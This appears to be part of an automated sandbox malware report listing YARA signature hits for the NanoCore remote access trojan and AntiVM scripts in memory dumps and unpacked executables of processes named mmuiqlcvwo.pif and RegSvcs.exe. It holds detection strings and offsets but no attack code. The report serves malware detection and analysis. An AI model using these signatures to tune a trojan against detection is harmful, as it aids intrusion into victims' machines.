0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10b0d:$a: NanoCore 0x10b1d:$a: NanoCore 0x10d51:$a: NanoCore 0x10d65:$a: NanoCore 0x10da5:$a: NanoCore 0x10b6c:$b: ClientPlugin 0x10d6e:$b: ClientPlugin 0x10dae:$b: ClientPlugin 0x10c93:$c: ProjectData 0x1169a:$d: DESCrypto 0x19066:$e: KeepAlive 0x17054:$g: LogClientMessage 0x1324f:$i: get_Connected 0x119d0:$j: #=q 0x11a00:$j: #=q 0x11a1c:$j: #=q 0x11a4c:$j: #=q 0x11a68:$j: #=q 0x11a84:$j: #=q 0x11ab4:$j: #=q 0x11ad0:$j: #=q
0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf1d5:$x1: NanoCore.ClientPluginHost 0x423cd:$x1: NanoCore.ClientPluginHost 0xf212:$x2: IClientNetworkHost 0x4240a:$x2: IClientNetworkHost 0x12d45:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x45f3d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xef3d:$a: NanoCore 0xef4d:$a: NanoCore 0xf181:$a: NanoCore 0xf195:$a: NanoCore 0xf1d5:$a: NanoCore 0x42135:$a: NanoCore 0x42145:$a: NanoCore 0x42379:$a: NanoCore 0x4238d:$a: NanoCore 0x423cd:$a: NanoCore 0xef9c:$b: ClientPlugin 0xf19e:$b: ClientPlugin 0xf1de:$b: ClientPlugin 0x42194:$b: ClientPlugin 0x42396:$b: ClientPlugin 0x423d6:$b: ClientPlugin 0xf0c3:$c: ProjectData 0x422bb:$c: ProjectData 0xfaca:$d: DESCrypto 0x42cc2:$d: DESCrypto 0x17496:$e: KeepAlive
00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10195:$x1: NanoCore.ClientPluginHost 0x101d2:$x2: IClientNetworkHost 0x13d05:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfefd:$a: NanoCore 0xff0d:$a: NanoCore 0x10141:$a: NanoCore 0x10155:$a: NanoCore 0x10195:$a: NanoCore 0xff5c:$b: ClientPlugin 0x1015e:$b: ClientPlugin 0x1019e:$b: ClientPlugin 0x10083:$c: ProjectData 0x10a8a:$d: DESCrypto 0x18456:$e: KeepAlive 0x16444:$g: LogClientMessage 0x1263f:$i: get_Connected 0x10dc0:$j: #=q 0x10df0:$j: #=q 0x10e0c:$j: #=q 0x10e3c:$j: #=q 0x10e58:$j: #=q 0x10e74:$j: #=q 0x10ea4:$j: #=q 0x10ec0:$j: #=q
0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xfbad:$x1: NanoCore.ClientPluginHost 0xfbea:$x2: IClientNetworkHost 0x1371d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xf915:$a: NanoCore 0xf925:$a: NanoCore 0xfb59:$a: NanoCore 0xfb6d:$a: NanoCore 0xfbad:$a: NanoCore 0xf974:$b: ClientPlugin 0xfb76:$b: ClientPlugin 0xfbb6:$b: ClientPlugin 0xfa9b:$c: ProjectData 0x104a2:$d: DESCrypto 0x17e6e:$e: KeepAlive 0x15e5c:$g: LogClientMessage 0x12057:$i: get_Connected 0x107d8:$j: #=q 0x10808:$j: #=q 0x10824:$j: #=q 0x10854:$j: #=q 0x10870:$j: #=q 0x1088c:$j: #=q 0x108bc:$j: #=q 0x108d8:$j: #=q
0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xffad:$x1: NanoCore.ClientPluginHost 0xffea:$x2: IClientNetworkHost 0x13b1d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfd15:$a: NanoCore 0xfd25:$a: NanoCore 0xff59:$a: NanoCore 0xff6d:$a: NanoCore 0xffad:$a: NanoCore 0xfd74:$b: ClientPlugin 0xff76:$b: ClientPlugin 0xffb6:$b: ClientPlugin 0xfe9b:$c: ProjectData 0x108a2:$d: DESCrypto 0x1826e:$e: KeepAlive 0x1625c:$g: LogClientMessage 0x12457:$i: get_Connected 0x10bd8:$j: #=q 0x10c08:$j: #=q 0x10c24:$j: #=q 0x10c54:$j: #=q 0x10c70:$j: #=q 0x10c8c:$j: #=q 0x10cbc:$j: #=q 0x10cd8:$j: #=q
00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff9d:$x1: NanoCore.ClientPluginHost 0x42da5:$x1: NanoCore.ClientPluginHost 0xffda:$x2: IClientNetworkHost 0x42de2:$x2: IClientNetworkHost 0x13b0d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x46915:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfd05:$a: NanoCore 0xfd15:$a: NanoCore 0xff49:$a: NanoCore 0xff5d:$a: NanoCore 0xff9d:$a: NanoCore 0x42b0d:$a: NanoCore 0x42b1d:$a: NanoCore 0x42d51:$a: NanoCore 0x42d65:$a: NanoCore 0x42da5:$a: NanoCore 0xfd64:$b: ClientPlugin 0xff66:$b: ClientPlugin 0xffa6:$b: ClientPlugin 0x42b6c:$b: ClientPlugin 0x42d6e:$b: ClientPlugin 0x42dae:$b: ClientPlugin 0xfe8b:$c: ProjectData 0x42c93:$c: ProjectData 0x10892:$d: DESCrypto 0x4369a:$d: DESCrypto 0x1825e:$e: KeepAlive
0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1ae51:$a: NanoCore 0x24bbf:$a: NanoCore 0x24c18:$a: NanoCore 0x24c55:$a: NanoCore 0x24cce:$a: NanoCore 0x24c21:$b: ClientPlugin 0x24c5e:$b: ClientPlugin 0x2555c:$b: ClientPlugin 0x25569:$b: ClientPlugin 0x1ad27:$e: KeepAlive 0x250a9:$g: LogClientMessage 0x25029:$i: get_Connected 0x14ff5:$j: #=q 0x15025:$j: #=q 0x15061:$j: #=q 0x15089:$j: #=q 0x150b9:$j: #=q 0x150e9:$j: #=q 0x15119:$j: #=q 0x15149:$j: #=q 0x15165:$j: #=q
00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf9ad:$x1: NanoCore.ClientPluginHost 0x2c14d:$x1: NanoCore.ClientPluginHost 0xf9ea:$x2: IClientNetworkHost 0x2c18a:$x2: IClientNetworkHost 0x1351d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x2fcbd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xf715:$a: NanoCore 0xf725:$a: NanoCore 0xf959:$a: NanoCore 0xf96d:$a: NanoCore 0xf9ad:$a: NanoCore 0x2beb5:$a: NanoCore 0x2bec5:$a: NanoCore 0x2c0f9:$a: NanoCore 0x2c10d:$a: NanoCore 0x2c14d:$a: NanoCore 0xf774:$b: ClientPlugin 0xf976:$b: ClientPlugin 0xf9b6:$b: ClientPlugin 0x2bf14:$b: ClientPlugin 0x2c116:$b: ClientPlugin 0x2c156:$b: ClientPlugin 0xf89b:$c: ProjectData 0x2c03b:$c: ProjectData 0x102a2:$d: DESCrypto 0x2ca42:$d: DESCrypto 0x17c6e:$e: KeepAlive
Process Memory Space: mmuiqlcvwo.pif PID: 2516	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xfdf7:$x1: NanoCore.ClientPluginHost 0xfe34:$x2: IClientNetworkHost 0x138f2:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x1e978:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x146bad:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x1c1179:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x1cc4dc:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x23fa36:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x24af2f:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x257f42:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x2f5ccd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x301030:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x5100e4:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x59d67d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x5a8bc4:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x5bc8cd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x5c7b0e:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: mmuiqlcvwo.pif PID: 2516	JoeSecurity_AntiVM_1	Yara detected AntiVM autoit script	Joe Security
Process Memory Space: mmuiqlcvwo.pif PID: 2516	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: mmuiqlcvwo.pif PID: 2516	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: mmuiqlcvwo.pif PID: 2516	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfade:$a: NanoCore 0xfaee:$a: NanoCore 0xfb93:$a: NanoCore 0xfba2:$a: NanoCore 0xfda3:$a: NanoCore 0xfdb7:$a: NanoCore 0xfdf7:$a: NanoCore 0x1afe2:$a: NanoCore 0x1aff4:$a: NanoCore 0x1b030:$a: NanoCore 0x143217:$a: NanoCore 0x143229:$a: NanoCore 0x143265:$a: NanoCore 0x1bd7e3:$a: NanoCore 0x1bd7f5:$a: NanoCore 0x1bd831:$a: NanoCore 0x1c8b46:$a: NanoCore 0x1c8b58:$a: NanoCore 0x1c8b94:$a: NanoCore 0x23c0a0:$a: NanoCore 0x23c0b2:$a: NanoCore
Process Memory Space: RegSvcs.exe PID: 2780	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x573:$x1: NanoCore.ClientPluginHost 0x58d:$x2: IClientNetworkHost 0x7c9a:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x12aed:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: RegSvcs.exe PID: 2780	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 2780	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4dd:$a: NanoCore 0x536:$a: NanoCore 0x573:$a: NanoCore 0x5ec:$a: NanoCore 0xce2:$a: NanoCore 0xd35:$a: NanoCore 0xd6e:$a: NanoCore 0xde1:$a: NanoCore 0x447a:$a: NanoCore 0x448a:$a: NanoCore 0x4509:$a: NanoCore 0x4518:$a: NanoCore 0xf157:$a: NanoCore 0xf169:$a: NanoCore 0xf1a5:$a: NanoCore 0x1b6ce:$a: NanoCore 0x1b729:$a: NanoCore 0x2064e:$a: NanoCore 0x492c2:$a: NanoCore 0x492d5:$a: NanoCore 0x49307:$a: NanoCore
Process Memory Space: mmuiqlcvwo.pif PID: 2568	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5117d:$x1: NanoCore.ClientPluginHost 0x511ba:$x2: IClientNetworkHost 0x54ca4:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x5fd2a:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x1a9934:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x21f2c7:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x291c1b:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x41d8f1:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x428c54:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x433fcc:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x43f512:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x5e2f5c:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x5ee5c3:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x5f9926:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x604cc1:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x6125a5:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: mmuiqlcvwo.pif PID: 2568	JoeSecurity_AntiVM_1	Yara detected AntiVM autoit script	Joe Security
Process Memory Space: mmuiqlcvwo.pif PID: 2568	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: mmuiqlcvwo.pif PID: 2568	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: mmuiqlcvwo.pif PID: 2568	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x50e57:$a: NanoCore 0x50e67:$a: NanoCore 0x50f19:$a: NanoCore 0x50f28:$a: NanoCore 0x51129:$a: NanoCore 0x5113d:$a: NanoCore 0x5117d:$a: NanoCore 0x5c394:$a: NanoCore 0x5c3a6:$a: NanoCore 0x5c3e2:$a: NanoCore 0x1a5f9e:$a: NanoCore 0x1a5fb0:$a: NanoCore 0x1a5fec:$a: NanoCore 0x21b931:$a: NanoCore 0x21b943:$a: NanoCore 0x21b97f:$a: NanoCore 0x28e285:$a: NanoCore 0x28e297:$a: NanoCore 0x28e2d3:$a: NanoCore 0x419f5b:$a: NanoCore 0x419f6d:$a: NanoCore
Process Memory Space: RegSvcs.exe PID: 684	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2df3:$x1: NanoCore.ClientPluginHost 0x2e0d:$x2: IClientNetworkHost 0x2ce81:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x37988:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: RegSvcs.exe PID: 684	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 684	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2d5d:$a: NanoCore 0x2db6:$a: NanoCore 0x2df3:$a: NanoCore 0x2e6c:$a: NanoCore 0x3725:$a: NanoCore 0x3778:$a: NanoCore 0x37b1:$a: NanoCore 0x3824:$a: NanoCore 0xadf6:$a: NanoCore 0xae09:$a: NanoCore 0xae3b:$a: NanoCore 0x1060b:$a: NanoCore 0x10bbd:$a: NanoCore 0x10bd0:$a: NanoCore 0x10c02:$a: NanoCore 0x161a3:$a: NanoCore 0x28b06:$a: NanoCore 0x28b1a:$a: NanoCore 0x29a31:$a: NanoCore 0x29a40:$a: NanoCore 0x33ff2:$a: NanoCore
Click to see the 88 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.3.mmuiqlcvwo.pif.3a5d828.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.3.mmuiqlcvwo.pif.3a5d828.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
5.3.mmuiqlcvwo.pif.3a5d828.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.3.mmuiqlcvwo.pif.3a5d828.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
6.2.RegSvcs.exe.ae4629.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost
6.2.RegSvcs.exe.ae4629.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost
6.2.RegSvcs.exe.ae4629.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
6.2.RegSvcs.exe.a30000.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
6.2.RegSvcs.exe.a30000.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
6.2.RegSvcs.exe.247e010.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
6.2.RegSvcs.exe.247e010.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
5.3.mmuiqlcvwo.pif.3a5d828.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.3.mmuiqlcvwo.pif.3a5d828.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
5.3.mmuiqlcvwo.pif.3a5d828.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.3.mmuiqlcvwo.pif.3a5d828.2.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
6.2.RegSvcs.exe.ae0000.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
6.2.RegSvcs.exe.ae0000.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
6.2.RegSvcs.exe.ae0000.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.RegSvcs.exe.36e02a4.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
13.2.RegSvcs.exe.36e02a4.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
13.2.RegSvcs.exe.36e02a4.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
